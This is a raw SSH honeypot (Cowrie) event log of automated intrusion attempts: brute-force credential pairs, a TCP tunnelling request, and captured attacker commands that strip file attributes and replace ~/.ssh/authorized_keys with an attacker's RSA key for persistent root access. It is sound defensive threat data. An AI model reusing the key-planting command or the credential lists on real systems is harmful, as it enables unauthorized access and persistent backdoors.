{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:41:42.682893Z","src_ip":"170.64.157.139","session":"5058df35cda5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:41:42.982274Z","src_ip":"170.64.157.139","session":"5058df35cda5"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"q1w2e3","message":"login attempt [postgres/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-09-08T18:41:43.878416Z","src_ip":"170.64.157.139","session":"5058df35cda5"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:41:45.179060Z","src_ip":"170.64.157.139","session":"5058df35cda5"}
{"eventid":"cowrie.session.connect","src_ip":"98.70.229.148","src_port":53674,"dst_ip":"1.2.3.4","dst_port":22,"session":"274b02e709a5","protocol":"ssh","message":"New connection: 98.70.229.148:53674 (1.2.3.4:22) [session: 274b02e709a5]","sensor":"my-vps","timestamp":"2025-09-08T18:42:17.474992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:42:17.475942Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:42:17.677096Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.login.success","username":"root","password":"1357924680","message":"login attempt [root/1357924680] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:42:18.524433Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:42:18.946098Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:42:18.946793Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:42:18.947901Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:42:19.150378Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:42:19.651814Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T18:42:19.652499Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T18:42:19.856186Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:42:19.857051Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.session.connect","src_ip":"98.70.229.148","src_port":53688,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a9d299a405f","protocol":"ssh","message":"New connection: 98.70.229.148:53688 (1.2.3.4:22) [session: 2a9d299a405f]","sensor":"my-vps","timestamp":"2025-09-08T18:42:20.057865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:42:20.058521Z","src_ip":"98.70.229.148","session":"2a9d299a405f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:42:20.260508Z","src_ip":"98.70.229.148","session":"2a9d299a405f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T18:42:21.109551Z","src_ip":"98.70.229.148","session":"2a9d299a405f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:42:22.314445Z","src_ip":"98.70.229.148","session":"2a9d299a405f"}
{"eventid":"cowrie.session.connect","src_ip":"98.70.229.148","src_port":53704,"dst_ip":"1.2.3.4","dst_port":22,"session":"5604fdaa66db","protocol":"ssh","message":"New connection: 98.70.229.148:53704 (1.2.3.4:22) [session: 5604fdaa66db]","sensor":"my-vps","timestamp":"2025-09-08T18:42:22.515630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:42:22.516382Z","src_ip":"98.70.229.148","session":"5604fdaa66db"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:42:22.718410Z","src_ip":"98.70.229.148","session":"5604fdaa66db"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:42:23.566227Z","src_ip":"98.70.229.148","session":"5604fdaa66db"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:42:23.769924Z","src_ip":"98.70.229.148","session":"274b02e709a5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:42:23.771284Z","src_ip":"98.70.229.148","session":"5604fdaa66db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9375,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad1c228f32ef","protocol":"ssh","message":"New connection: 212.227.125.160:9375 (1.2.3.4:22) [session: ad1c228f32ef]","sensor":"my-vps","timestamp":"2025-09-08T18:42:36.689714Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:42:36.690944Z","src_ip":"212.227.125.160","session":"ad1c228f32ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9661,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f098da15d9b","protocol":"ssh","message":"New connection: 212.227.125.160:9661 (1.2.3.4:22) [session: 8f098da15d9b]","sensor":"my-vps","timestamp":"2025-09-08T18:42:36.805401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:42:36.806199Z","src_ip":"212.227.125.160","session":"8f098da15d9b"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T18:42:36.921907Z","src_ip":"212.227.125.160","session":"8f098da15d9b"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:42:37.271998Z","src_ip":"212.227.125.160","session":"8f098da15d9b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T18:42:37.388535Z","session":"8f098da15d9b"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":37190,"dst_ip":"1.2.3.4","dst_port":22,"session":"6685aa604b26","protocol":"ssh","message":"New connection: 170.64.157.139:37190 (1.2.3.4:22) [session: 6685aa604b26]","sensor":"my-vps","timestamp":"2025-09-08T18:43:01.363450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:43:01.364437Z","src_ip":"170.64.157.139","session":"6685aa604b26"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:43:01.660750Z","src_ip":"170.64.157.139","session":"6685aa604b26"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"q1w2e3r4","message":"login attempt [postgres/q1w2e3r4] failed","sensor":"my-vps","timestamp":"2025-09-08T18:43:02.554983Z","src_ip":"170.64.157.139","session":"6685aa604b26"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:43:03.852962Z","src_ip":"170.64.157.139","session":"6685aa604b26"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51640,"dst_ip":"1.2.3.4","dst_port":22,"session":"969c2f179d05","protocol":"ssh","message":"New connection: 217.72.205.35:51640 (1.2.3.4:22) [session: 969c2f179d05]","sensor":"my-vps","timestamp":"2025-09-08T18:43:23.019468Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:43:23.020992Z","src_ip":"217.72.205.35","session":"969c2f179d05"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:43:46.805551Z","src_ip":"212.227.125.160","session":"8f098da15d9b"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":51644,"dst_ip":"1.2.3.4","dst_port":22,"session":"c86cbaf10628","protocol":"ssh","message":"New connection: 170.64.157.139:51644 (1.2.3.4:22) [session: c86cbaf10628]","sensor":"my-vps","timestamp":"2025-09-08T18:44:15.503242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:44:15.505711Z","src_ip":"170.64.157.139","session":"c86cbaf10628"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:44:15.795651Z","src_ip":"170.64.157.139","session":"c86cbaf10628"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1q2w3e","message":"login attempt [postgres/1q2w3e] failed","sensor":"my-vps","timestamp":"2025-09-08T18:44:16.967181Z","src_ip":"170.64.157.139","session":"c86cbaf10628"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:44:18.260160Z","src_ip":"170.64.157.139","session":"c86cbaf10628"}
{"eventid":"cowrie.session.connect","src_ip":"116.193.191.90","src_port":57546,"dst_ip":"1.2.3.4","dst_port":22,"session":"9be0b6fce3f0","protocol":"ssh","message":"New connection: 116.193.191.90:57546 (1.2.3.4:22) [session: 9be0b6fce3f0]","sensor":"my-vps","timestamp":"2025-09-08T18:44:31.735444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T18:44:31.736205Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T18:44:31.997554Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Oldpassword12#","message":"login attempt [root/Oldpassword12#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:44:33.083430Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:44:33.623705Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:44:33.624353Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T18:44:33.625406Z","src_ip":"116.193.191.90","session":"9be0b6fce3f0"}
